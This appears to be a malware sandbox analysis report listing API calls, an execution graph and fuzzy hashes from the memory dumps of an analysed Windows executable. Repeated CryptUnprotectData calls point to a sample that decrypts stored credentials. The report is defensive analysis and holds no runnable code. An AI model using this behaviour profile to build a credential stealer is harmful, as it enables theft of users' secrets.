                                                                                                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\________.exe,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405997
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                  • API String ID: 2709904686-1876063424
                                                                                                                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                                  • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                                  • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloclstrcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 852173138-0
                                                                                                                                                  • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                                  • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                                                  • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                                  • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                                  • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                                  • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                                  • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                                  • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                                  • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:9%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:8.5%
                                                                                                                                                  Total number of Nodes:130
                                                                                                                                                  Total number of Limit Nodes:14
                                                                                                                                                  execution_graph 69914 367268b0 69915 36726918 CreateWindowExW 69914->69915 69917 367269d4 69915->69917 69917->69917 69918 360bba68 DuplicateHandle 69919 360bbafe 69918->69919 69920 3672b038 69921 3672b060 69920->69921 69924 3672b08c 69920->69924 69922 3672b069 69921->69922 69925 3672a534 69921->69925 69926 3672a53f 69925->69926 69927 3672b383 69926->69927 69929 3672a550 69926->69929 69927->69924 69930 3672b3b8 OleInitialize 69929->69930 69932 3672b41c 69930->69932 69932->69927 69933 360bb820 69934 360bb866 GetCurrentProcess 69933->69934 69936 360bb8b8 GetCurrentThread 69934->69936 69937 360bb8b1 69934->69937 69938 360bb8ee 69936->69938 69939 360bb8f5 GetCurrentProcess 69936->69939 69937->69936 69938->69939 69942 360bb92b 69939->69942 69940 360bb953 GetCurrentThreadId 69941 360bb984 69940->69941 69942->69940 69990 15e2a8 69991 15e2b4 69990->69991 70002 35e97b69 69991->70002 70006 35e97b77 69991->70006 70010 35e97b78 69991->70010 69992 15e464 70014 35f05b37 69992->70014 70018 35f05b48 69992->70018 69993 15e575 69994 15eb72 69993->69994 70022 360ba718 69993->70022 70026 360ba70a 69993->70026 70004 35e97b70 70002->70004 70003 35e98029 70003->69992 70004->70003 70030 35e98431 70004->70030 70008 35e97b9a 70006->70008 70007 35e98029 70007->69992 70008->70007 70009 35e98431 CryptUnprotectData 70008->70009 70009->70008 70012 35e97b9a 70010->70012 70011 35e98029 70011->69992 70012->70011 70013 35e98431 CryptUnprotectData 70012->70013 70013->70012 70016 35f05b3f 70014->70016 70015 35f06039 70015->69993 70016->70015 70017 35e98431 CryptUnprotectData 70016->70017 70017->70016 70020 35f05b6a 70018->70020 70019 35f06039 70019->69993 70020->70019 70021 35e98431 CryptUnprotectData 70020->70021 70021->70020 70023 360ba727 70022->70023 70058 360ba110 70023->70058 70027 360ba727 70026->70027 70028 360ba110 2 API calls 70027->70028 70029 360ba748 70028->70029 70029->69994 70031 35e98440 70030->70031 70035 35e98a59 70031->70035 70043 35e98a68 70031->70043 70032 35e984b0 70032->70004 70036 35e98a5f 70035->70036 70037 35e98b41 70036->70037 70040 35e98a59 CryptUnprotectData 70036->70040 70042 35e98a68 CryptUnprotectData 70036->70042 70051 35e98ca8 70036->70051 70055 35e986c4 70037->70055 70040->70037 70042->70037 70044 35e98a8d 70043->70044 70045 35e98b41 70043->70045 70044->70045 70048 35e98a59 CryptUnprotectData 70044->70048 70049 35e98ca8 CryptUnprotectData 70044->70049 70050 35e98a68 CryptUnprotectData 70044->70050 70046 35e986c4 CryptUnprotectData 70045->70046 70047 35e98d0d 70046->70047 70047->70032 70048->70045 70049->70045 70050->70045 70052 35e98cb2 70051->70052 70053 35e986c4 CryptUnprotectData 70052->70053 70054 35e98d0d 70053->70054 70054->70037 70056 35e98ef8 CryptUnprotectData 70055->70056 70057 35e98d0d 70056->70057 70057->70032 70059 360ba11b 70058->70059 70062 360bb5a4 70059->70062 70061 360bc0ce 70063 360bb5af 70062->70063 70064 360bc84f 70063->70064 70067 3672b9d8 70063->70067 70071 3672b9cd 70063->70071 70064->70061 70069 3672ba3d 70067->70069 70068 3672ba8a 70068->70064 70069->70068 70070 3672bea0 WaitMessage 70069->70070 70070->70069 70074 3672b9d8 70071->70074 70072 3672bea0 WaitMessage 70072->70074 70073 3672ba8a 70073->70064 70074->70072 70074->70073 69943 ad044 69944 ad05c 69943->69944 69945 ad0b6 69944->69945 69949 36726a68 69944->69949 69953 36725bec 69944->69953 69961 367277b8 69944->69961 69950 36726a8e 69949->69950 69951 36725bec CallWindowProcW 69950->69951 69952 36726aaf 69951->69952 69952->69945 69956 36725bf7 69953->69956 69954 36727829 69958 36727827 69954->69958 69978 36725d14 69954->69978 69956->69954 69957 36727819 69956->69957 69969 36727950 69957->69969 69973 36727a1c 69957->69973 69962 367277c8 69961->69962 69963 36727829 69962->69963 69965 36727819 69962->69965 69964 36725d14 CallWindowProcW 69963->69964 69966 36727827 69963->69966 69964->69966 69967 36727950 CallWindowProcW 69965->69967 69968 36727a1c CallWindowProcW 69965->69968 69967->69966 69968->69966 69970 36727964 69969->69970 69982 36727a08 69970->69982 69971 367279f0 69971->69958 69974 36727a2a 69973->69974 69975 367279da 69973->69975 69977 36727a08 CallWindowProcW 69975->69977 69976 367279f0 69976->69958 69977->69976 69979 36725d1f 69978->69979 69980 36728f0a CallWindowProcW 69979->69980 69981 36728eb9 69979->69981 69980->69981 69981->69958 69984 36727a19 69982->69984 69985 36728d84 69982->69985 69984->69971 69988 36728d5e 69985->69988 69986 36725d14 CallWindowProcW 69987 36728e5a 69986->69987 69987->69984 69988->69984 69988->69985 69988->69986 69989 36728cec 69988->69989 69989->69984
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: N
                                                                                                                                                  • API String ID: 0-1130791706
                                                                                                                                                  • Opcode ID: 7ed7b94c1bafb647bf690da9421d7a1b675f7aed10575e9faa0125bb4eddf864
                                                                                                                                                  • Instruction ID: 8f835830c2f502045fe5e70386569dae55f8f7b21c119a54d453f21542693c3d
                                                                                                                                                  • Opcode Fuzzy Hash: 7ed7b94c1bafb647bf690da9421d7a1b675f7aed10575e9faa0125bb4eddf864
                                                                                                                                                  • Instruction Fuzzy Hash: A173E631D1075A8EDB11EF68C944A99FBB1FF99304F51C69AE44877221EB70AAC4CF81
                                                                                                                                                  APIs
                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 35E98F5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                  • Opcode ID: dd7f5f2b2bfa8945c55ee955463289a476115edeb09a80188dc3430e4db895ff
                                                                                                                                                  • Instruction ID: f43299309fa60ffbd4629ad8c0c6184e1ae231fc488a3bd1fd9bfded22f32b4b
                                                                                                                                                  • Opcode Fuzzy Hash: dd7f5f2b2bfa8945c55ee955463289a476115edeb09a80188dc3430e4db895ff
                                                                                                                                                  • Instruction Fuzzy Hash: CD11567680434DEFDB10CF9AD800BDEBBF5EB48320F14845AE918A7211C379A950CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 35E98F5D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                                  • Opcode ID: 2dd3aff2a7e4b3d3c270c6d467575f36af795e96f1a8b6a8c8fd3f1ff461932e
                                                                                                                                                  • Instruction ID: 05fa7e6bb0139fd71013acd77d0cd5aa4b3ab61313769ce605889dc37f9baa8c
                                                                                                                                                  • Opcode Fuzzy Hash: 2dd3aff2a7e4b3d3c270c6d467575f36af795e96f1a8b6a8c8fd3f1ff461932e
                                                                                                                                                  • Instruction Fuzzy Hash: 771164B6800249EFDB10CF9AD800BDEBFF5EF48320F14841AE968A7211C339A550CFA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <B2
                                                                                                                                                  • API String ID: 0-971703402
                                                                                                                                                  • Opcode ID: 8b799b84cc388af1e8012dfe9c3fab14ac171f32123d707b0994905fc22dac48
                                                                                                                                                  • Instruction ID: 6df6fec29f2a48f37b7a467e2c56cc06d32c5477015e52f6a3718d4d6185d233
                                                                                                                                                  • Opcode Fuzzy Hash: 8b799b84cc388af1e8012dfe9c3fab14ac171f32123d707b0994905fc22dac48
                                                                                                                                                  • Instruction Fuzzy Hash: 47E1ADB4E01218CFEB64DFA9C940B9DBBB2BF89304F2081A9E419B7351DB755A81CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <B2
                                                                                                                                                  • API String ID: 0-971703402
                                                                                                                                                  • Opcode ID: c4b137b98ab38ce8828f915958fffa711df398554dfcb03bafbcd12d21bb0ef5
                                                                                                                                                  • Instruction ID: 26e19c76f5369c64d275bc463fdb2c1645d27a50a219f612e253db9709e3475c
                                                                                                                                                  • Opcode Fuzzy Hash: c4b137b98ab38ce8828f915958fffa711df398554dfcb03bafbcd12d21bb0ef5
                                                                                                                                                  • Instruction Fuzzy Hash: 8CD1A074E01218CFEB54DFA9D990B9DBBB2BF89300F1081A9D809AB365DB355D81CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <B2
                                                                                                                                                  • API String ID: 0-971703402
                                                                                                                                                  • Opcode ID: db8dae9e2faaf0797c82493c6c6f4ebc12faa576cc2ca0ed46c8c976d1f13ba3
                                                                                                                                                  • Instruction ID: 78057196d6008aa92811d4cf82ee5ef7853ad9dbe5f29c67f26ff0a479a9ec36
                                                                                                                                                  • Opcode Fuzzy Hash: db8dae9e2faaf0797c82493c6c6f4ebc12faa576cc2ca0ed46c8c976d1f13ba3
                                                                                                                                                  • Instruction Fuzzy Hash: ABD1AF74E01218CFEB55DFA9C990B9DBBB2BF89300F1080A9D409AB365DB355D81CF51
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 5
                                                                                                                                                  • API String ID: 0-2226203566
                                                                                                                                                  • Opcode ID: 82da7a1af4c76d2bef292026eb2968aa035b10f562e7e9773f9e365f069414f1
                                                                                                                                                  • Instruction ID: b6be48a0d01b3d0ff53a22963a1bb848b088d6d0070242a6771b8633e4c22e40
                                                                                                                                                  • Opcode Fuzzy Hash: 82da7a1af4c76d2bef292026eb2968aa035b10f562e7e9773f9e365f069414f1
                                                                                                                                                  • Instruction Fuzzy Hash: 1D410675E00248CBEB08CFAAD950A9EBBF2BF89304F14C52AC418BB355DB355946CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a357a8c3b9967b3effd1bc8453095b5003dba31ad927a764d7e59ccff91539be
                                                                                                                                                  • Instruction ID: dd80daeb6025b309e7f91a959f38348a3d6b395afb59cc967b47cd7a643c909e
                                                                                                                                                  • Opcode Fuzzy Hash: a357a8c3b9967b3effd1bc8453095b5003dba31ad927a764d7e59ccff91539be
                                                                                                                                                  • Instruction Fuzzy Hash: 65727270604205DFCB15CF68C594AAEBBF2FF48311F158559E8269F2A2D730ED89CB51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 62e48692efc498deab0d28095007c8b3e980204734d8fd5be04f0a1c8a701c40
                                                                                                                                                  • Instruction ID: f99d030f179a78ed9f24afdfd46fe4a9c2346ccd84bea0a0df5deadc67a63306
                                                                                                                                                  • Opcode Fuzzy Hash: 62e48692efc498deab0d28095007c8b3e980204734d8fd5be04f0a1c8a701c40
                                                                                                                                                  • Instruction Fuzzy Hash: EC824A74E012288FDB64DF69C994BDEBBB2BF89300F1081E9981DA7261DB305E85CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 765675cbe2655872ecb8b0bad1f378526d7a91931bcd9c32455172c291589466
                                                                                                                                                  • Instruction ID: 7645b4c65050555c0d060f669f07f66b77210b53b1eb254048c6ec100b6ec371
                                                                                                                                                  • Opcode Fuzzy Hash: 765675cbe2655872ecb8b0bad1f378526d7a91931bcd9c32455172c291589466
                                                                                                                                                  • Instruction Fuzzy Hash: 97326C6680D7D48FCB678B7448E825B7FB16B92105BC945DFC4C78B687EB28C609C362
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 47c2848676fcde5b71091c85cdd19ba59b91398b627f77688d068d7ba829ff8d
                                                                                                                                                  • Instruction ID: bdbb74f79431e00f408599f2930362448a52f7f3425cd5b0e93947909b8b2e26
                                                                                                                                                  • Opcode Fuzzy Hash: 47c2848676fcde5b71091c85cdd19ba59b91398b627f77688d068d7ba829ff8d
                                                                                                                                                  • Instruction Fuzzy Hash: AA726D74E012288FEB65DF69C994BDEBBB2BF89300F1081E9944DA7261DB305E85CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a8d6e4412166a4fe100161f72ad25ed1df3af9700ac65dbff172a1350cb422c5
                                                                                                                                                  • Instruction ID: 9f20d8ad8740e2b1f08dd4fce35c62b1be07e420ec62d4304a4edd9704b9988c
                                                                                                                                                  • Opcode Fuzzy Hash: a8d6e4412166a4fe100161f72ad25ed1df3af9700ac65dbff172a1350cb422c5
                                                                                                                                                  • Instruction Fuzzy Hash: 24221674E042588FDB14DFA9C884BDEBBB2BF88304F5081A9D849AB355DF359985CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: abc30e61a5f685f5b9045660eb6d00927fd8ed0bfa936f79acfaea699f7a2a84
                                                                                                                                                  • Instruction ID: c3ae88791a01463d6c389058f234a6c84d25c2eff3e58f3976f9ada7c7377f45
                                                                                                                                                  • Opcode Fuzzy Hash: abc30e61a5f685f5b9045660eb6d00927fd8ed0bfa936f79acfaea699f7a2a84
                                                                                                                                                  • Instruction Fuzzy Hash: 12129170A04219CFDB14DF69D855BAEBBF6BF88301F108169E819EB391DB309D85CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ac33099949ec71de1c0c56a83cec5cf6010afaab2db91f074d7fbbce13aa84e9
                                                                                                                                                  • Instruction ID: a11bf4f22c97a3efc9f7cf513be237caed18283bbfdf2497b9ea471724f1bcd4
                                                                                                                                                  • Opcode Fuzzy Hash: ac33099949ec71de1c0c56a83cec5cf6010afaab2db91f074d7fbbce13aa84e9
                                                                                                                                                  • Instruction Fuzzy Hash: F0E1EB75A00318CFDB14DFA9C884A9DBBF2BF89315F158069E859AB361DB30AD45CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be74424d5327c03b12b6d7db9865d26749dcf35029927545d452d7d0051bb4e6
                                                                                                                                                  • Instruction ID: a4496d96470543870a2d22a267e0699a6954d0de9396f1a3678ef9a48d0c4020
                                                                                                                                                  • Opcode Fuzzy Hash: be74424d5327c03b12b6d7db9865d26749dcf35029927545d452d7d0051bb4e6
                                                                                                                                                  • Instruction Fuzzy Hash: 24D12C34A00619DFCB54CFA9D884AADBBF2BF88742F158055E865FB2A1DB30DD49CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4ec89b207873e55dbc7c39ae6d398ac3f3a60f5ccb5dc95817b014e44e4832e9
                                                                                                                                                  • Instruction ID: 466a3f2c2586356e4660aba95ad1f4cccd6fc9566c23c4e9ca662ea05eddd257
                                                                                                                                                  • Opcode Fuzzy Hash: 4ec89b207873e55dbc7c39ae6d398ac3f3a60f5ccb5dc95817b014e44e4832e9
                                                                                                                                                  • Instruction Fuzzy Hash: 21E1AF74E01218CFEB14DFA5C844BDDBBB2BF89304F2081A9D419AB3A1DB755A85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9cc222875ac3d309446b0ccc2b8533cc0650cbdcd8e3f92c3086a8e801c1a00e
                                                                                                                                                  • Instruction ID: 16197a49e680e057968a7e3e476b4a607ef700b10b5207ba668f5c9f372f16a0
                                                                                                                                                  • Opcode Fuzzy Hash: 9cc222875ac3d309446b0ccc2b8533cc0650cbdcd8e3f92c3086a8e801c1a00e
                                                                                                                                                  • Instruction Fuzzy Hash: D1D17D74E01218CFEB54DFA5C994B9DBBB2FB89300F5081A9D419AB364DB355E81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9df5485841d44dbba35f04a2dd2bc1ec7f09e9f4da652a00aa40a2e2f61f7b61
                                                                                                                                                  • Instruction ID: 34808e8f75e7596c36a8f01f26b08b520a21f1fcf2f855ec6104e6706447bc33
                                                                                                                                                  • Opcode Fuzzy Hash: 9df5485841d44dbba35f04a2dd2bc1ec7f09e9f4da652a00aa40a2e2f61f7b61
                                                                                                                                                  • Instruction Fuzzy Hash: 78D17B74E012188FDB54DFA9C994B9DBBB2FB89300F6081A9D419AB364DB359E81CF50
